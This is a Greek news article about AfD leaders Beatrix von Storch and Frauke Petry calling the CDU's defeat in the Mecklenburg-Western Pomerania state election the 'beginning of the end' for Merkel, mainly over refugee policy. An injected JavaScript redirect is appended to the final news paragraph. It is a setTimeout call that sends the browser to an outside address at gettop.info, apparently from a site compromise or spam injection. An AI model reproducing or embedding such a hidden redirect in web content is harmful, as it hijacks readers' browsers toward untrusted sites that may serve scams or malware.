Ακροδεξιό AfD: «Αρχή του τέλους» για τη Μέρκελ οι εκλογές

0
4

 

Ως «αρχή του τέλους της εποχής Μέρκελ» αξιολόγησε το εκλογικό αποτέλεσμα στο κρατίδιο Μεκλεμβούργο-Δυτική Πομερανία η αναπληρωτής πρόεδρος του κόμματος Εναλλακτική για τη Γερμανία (AfD) Μπεατρίξ φον Στόρχ σε πρωϊνή εκπομπή του πρώτου δημόσιου γερμανικού τηλεοπτικού δικτύου ARD.

«Ένας αυξανόμενος αριθμός πολιτών θέλει την αλλαγή» είπε αναφερόμενη στην πολιτική της καγκελαρίου Μέρκελ για το προσφυγικό. Οι πολίτες κατά την φον Στορχ έχουν αντιληφθεί «ότι δεν μπορούμε να εξακολουθήσουμε να έχουμε αυτό το κοινωνικό κράτος, όπως το έχουμε, με εκατοντάδες χιλιάδες πρόσφυγες».

Κατηγόρησε την καγκελάριο ότι «κάνει πολιτική παραμερίζοντας τους πολίτες. Φυσικά και είναι εντελώς δυσαρεστημένοι οι πολίτες σε ομοσπονδιακό επίπεδο», τόνισε και ανέφερε ως λόγο το «μεγάλο κενό στην πολιτική προσφορά».

To AfD «εισήλθε στην πολιτική σκηνή» και το κόμμα της θέλει «φυσικά να κυβερνήσει», τόνισε.

«Η κυρία Μέρκελ πέφτει από μόνη της», δήλωσε η Φράουκε Πέτρι, συμπρόεδρος του κόμματος Εναλλακτική για τη Γερμανία (AfD), σε συνέντευξή της στο ιδιωτικό τηλεοπτικό δίκτυο Phoenix.

Η Πέτρι θεωρεί την ήττα της Χριστιανοδημοκρατικής Ένωσης (CDU) στο κρατίδιο Μεκλεμβούργο-Δυτική Πομερανία ως αποτέλεσμα των μεγάλων λαθών του σε ομοσπονδιακό επίπεδο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here